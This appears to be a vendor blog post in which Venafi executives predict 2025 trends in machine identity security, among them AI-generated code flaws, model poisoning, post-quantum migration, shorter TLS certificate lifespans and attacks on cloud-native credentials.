Machine identities are the foundation of security—they ensure secure connections and communications between machines. But for many cybersecurity professionals, securing these critical assets is proving to be a bit of an elusive effort. Machine identities are evolving as fast—or faster—than other security components. This year alone, we’ve seen radical movement in AI, post-quantum cryptography and certificate lifespans. These disruptive elements, coupled with a bourgeoning threat landscape for machine identities, will require a keen focus in the coming year.
To help you prepare for what's ahead, we queried our machine identity security experts for their key predictions for 2025. Here’s what they had to say:
1. We will see our first major AI-generated code vulnerability
Kevin Bocek, Chief Innovation Officer at Venafi, a CyberArk Company
Development teams have adopted GenAI and other AI technologies with gusto, using AI to generate code for the applications we use in our daily lives. The drive for 10x developer is on. While in the past software development has relied on multiple eyes on code to make sure it’s secure and meets quality standards, this is starting to get pushed aside with the rise of AI coding. In the year ahead, I predict that we will see some companies get overly confident in AI’s capabilities and complacent about how AI-generated code is used—leading to vulnerable and malicious code making its way into production.
GenAI is amazing, but it is also easy to trick with the right prompts and prone to hallucinations. In the year ahead, companies that do not take these issues seriously will find themselves in hot water—in fact, 78% of security leaders believe AI-developed code will lead to a security reckoning. The CrowdStrike outage this year showed first-hand how quickly code goes from developer to disaster. With code originating from various sources and only expected to increase, it’s vital to authenticate code, applications and workloads based on their identity. With code signing set to become their first line of defense next year, businesses can ensure that code has come from a trusted source, has not changed and is approved for use.
Additional statistics to support this prediction:
Eighty-three percent of security leaders say their developers currently use AI to generate code, with 57% saying it has become common practice. However, 72% feel they have no choice but to allow developers to use AI to remain competitive, and 63% have considered banning the use of AI in coding due to the security risks.
2. AI will widen the attack surface as adversaries target model theft and poisoning attacks
Shivajee Samdarshi, Chief Product Officer at Venafi, a CyberArk Company
In 2025, attackers will turn their eye to AI poisoning attacks and model theft, as they seek out new ways to target companies. Large Language Models (LLMs) are by nature dependent on huge data repositories, making them potentially potent targets for attackers.
As companies continue to invest in generative AI, even developing their own LLMs, attackers will start to look for ways to compromise these new environments. One method is through poisoning attacks. By targeting ingress and egress data pipelines, we will see attackers manipulating data to poison AI models and the outputs they produce. Even minor tweaks to an AI model’s training data can trigger significant chaos once the model is deployed in production and starts acting autonomously.
There is also a risk that attackers will try to steal the models themselves, taking with them huge swathes of IP and R&D. As such, the focus for next year will shift from using GenAI safely to protecting the models themselves from manipulation and theft. This will put greater emphasis on the need for identity, authentication and authorization to ensure that the models are protected as well as the systems they access are protected.
The Generative AI Identity Crisis: Emerging AI Threatscapes and Mitigations
3. Quantum preparedness becomes the #1 board-level cybersecurity topic
Kevin Bocek, Chief Innovation Officer at Venafi, a CyberArk Company
Boards are already peppering CISOs with questions about companies’ quantum preparedness and migration strategies. Articles in business-level publications and beyond are raising questions and concerns. In 2025, post quantum readiness will become board’s hottest cybersecurity topic. This is a generational change in cybersecurity not just a simply Y2K event and will become top of boards list of cybersecurity and be with us for many years ahead.
Over the past year, significant advancements in quantum technology have already raised concerns about data security. As we approach the point where quantum computers could potentially break current encryption methods, it’s crucial for companies to develop their quantum readiness plans. Boards understand that this could lead to business crushing potential, as organizations wouldn’t be able to function in a digital world where it’s impossible to establish what is friend or foe.
The challenge in 2025 will be understanding where machine identities—authentication keys and certificates that facilitate secure machine-to-machine communication—are being utilized. This is the first step in post quantum readiness that will lead to the ability to shift to new quantum resistant machine identities. Larger organizations will have thousands, or even hundreds of thousands, of identities that need to be replaced with new quantum-proof identities. Research found 64% of security leaders say they “dread the day” the board asks about their migration plans and 67% think the shift to post-quantum cryptography will be a nightmare, as they don’t know where all their keys and certificates are.
Given this uncertainty, the journey to becoming quantum-proof must start now. In the coming year, companies will start replacing untrusted certificate authorities (CAs) as part of their transition to quantum-resilient systems. Fortunately, the necessary platforms to facilitate this transition are already available. Security teams can utilize integrated solutions such as certificate lifecycle management (CLM), PKI-as-a-service and workload identity issuers from a unified control plane. This streamlined approach will not only aid in securing machine identities but also lay a strong foundation for a successful migration to a post-quantum future.
Prepare for the Future of Cybersecurity: InfoSec's Guide to Post-Quantum Readiness
4. 90-day certificates will cause tsunami-sized waves of certificate-related outages
Kevin Bocek, Chief Innovation Officer at Venafi, a CyberArk Company
2025 will see a spike in outages due to a rise in expired certificates, as new mandates around certificate lifespans come into effect. Google announced its intention to mandate the use of 90-day certificates within Chrome in 2023. Apple has now taken the driver’s seat and is proposing a draft ballot for commentary to GitHub to shorten certificates to just 45 days by 2027. Either Google or Apple can take action on their own—like they have in the past—and certificate authorities (CAs) will have to comply. Ultimately this means security teams have to prepare now for an onslaught of developers and applications owners needing help with tsunami-sized waves of certificate expirations and outages.
The tide has turned against the current 398-day lifespans—and with good reason. Shorter certificate lifecycles make it harder for attackers to misuse TLS identities, so this is a necessary step to ensure the continued security and trust in our online world.
However, transitioning from renewing certificates every 398 days down to every 90 or 45 days will not be easy sailing. It creates a bigger burden for organizations, which will have to replace certificates up to nine times more often. Each of these certificates is a potential single point of failure if not properly managed and secured. We are going to see disruption. We are going to see outages. And we are going to see security incidents.
What’s required is for security teams to have: a) observability over certificates b) intelligence to know what’s at risk c) automation to take error and mistakes out of the entire handling of TLS certificates. Each step can’t be overlooked. For example, we’ve seen large outages with Microsoft Azure happen because a certificate was renewed but not installed. Complete observability not just for one day, but 24/7 is required. This is just one of the building blocks security teams need as part of their machine identity security program.
And companies are already struggling. In the past 12 months alone, 83% of organizations have been hit by certificate-related outages. Security leaders are already worried. Three quarters (74%) say that Google’s plans will cause chaos and 77% think more outages are ‘inevitable’—with 81% saying it will amplify existing challenges they have around managing certificates.
Ultimately though, companies will emerge from 2025 with a stronger and more resilient foundation of security. Most important is building a machine identity security program. We will see mass adoption of automation, with companies deploying control planes to manage and secure their machine identities, like TLS. This will help to raise the bar for internet security as a whole—while making certificate-related outages a thing of the past.
5. Attackers will target cloud native environments to disrupt critical company systems and shut down core services
Sitaram Iyer, VP of Emerging Technologies at Venafi, a CyberArk Company
As businesses rapidly adopt cloud native technologies like Kubernetes and service mesh, they often overlook specific security risks that make these environments appealing targets for attackers. In the coming year, cloud native and developer environments will become even bigger targets due to the surge in machine identities—like cloud access tokens, API keys and service accounts.
Machines—from IoT devices to servers, and even the workloads that run on them—all require unique identities that, like human credentials, can be hacked to expose critical information. Machine identities now outnumber human identities by 45 to 1, and this gap is expected to widen, set to reach 100 to 1 soon. The risk of exploitation grows if these identities aren’t consistently protected across environments—giving attackers more opportunities to exploit weak points.
For instance, compromising a single service account—which relies on machine identities—can grant direct entry into sensitive resources, often with privileged access that allows attackers to move laterally across cloud infrastructures. As we move into next year, this ability to exploit machine identities for unauthorized access will drive adversaries to focus more intently on cloud native environments. Successfully targeting machine identities gives attackers a clear pathway to admin-level control, that can enable everything from data theft to taking over – or shutting down – critical business services.
6. Hardware will become cool—again—as AI, cloud costs and IP considerations drive a re-assessment of on-premises workloads
Matt Barker, VP & Global Head of Workload Identity Architecture at Venafi, a CyberArk Company
Let’s face it, the cost of running an application is getting expensive. There are now so many layers in the stack that cost of goods sold (COGS) is inflating and margins are being squeezed. This leads people to question if there’s a cheaper way of doing it.
At the same time, AI is hungry for resources, costly as a service and for the most valuable use cases requires ultra-low latency. On top of this, companies are becoming more acutely aware of the value of their data, both in the context of AI inference and their need to protect it from attack.
It's thanks to a combination of these factors that for the first time in a while, we are seeing a renewed interest in hardware. Engineers drool over Oxide and Civo racks, and many buyers of hardware—from the likes of Dell to NVIDIA—start to question which software stacks 'come with their GPUs’ out of the box.
This growing trend will also lead to knock-on effects, including more dispersion of compute. As this happens, it will put yet more pressure on the need to implement consistent security frameworks and authentication methods to ensure both cloud-based security and data centres provide the same level of protection and control.
7. Machine Identity Security teams will become the norm for forward-thinking enterprises in 2025
Kevin Bocek, Chief Innovation Officer at Venafi, a CyberArk Company
Next year, machine identity security will emerge as its own defined category, rather than being lumped into broader identity programs. CISOs now understand that there are human and machine identity programs required, and now people and organizations will change.
This shift is being driven by several factors. Attackers are increasingly zeroing in on machine identities, particularly in cloud native and development environments. For instance, groups such as IntelBroker recently claimed to be selling stolen machine identities and developer assets from both Cisco and Nokia. Meanwhile, the rapid adoption of cloud-native technologies and AI are fueling the growing complexity and speed at which identities like TLS and SPIFFE are being created and deployed to critical systems.
At the same time, the machine identity landscape is shifting. Shortening lifecycles for machine identities are making management more demanding, while the rise of quantum encryption is pushing organizations to consider their post-quantum readiness. Compounding the challenge is sheer volume: machine identities now outnumber human identities by 45 to 1. And this gap is expected to widen, set to reach 100 to 1 soon.
To manage these changes, forward-looking companies have already formalized their response by creating dedicated Machine Identity Security programs. As these challenges become more acute, we will see more companies follow suit to develop comprehensive, automated Machine Identity Security programs to better position themselves to get ahead of the challenges of today and tomorrow. Those that don’t will witness daily outages and security incidents as the machine identity landscape becomes more turbulent.